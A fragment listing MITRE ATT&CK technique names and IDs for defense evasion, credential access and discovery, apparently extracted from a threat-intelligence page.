Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery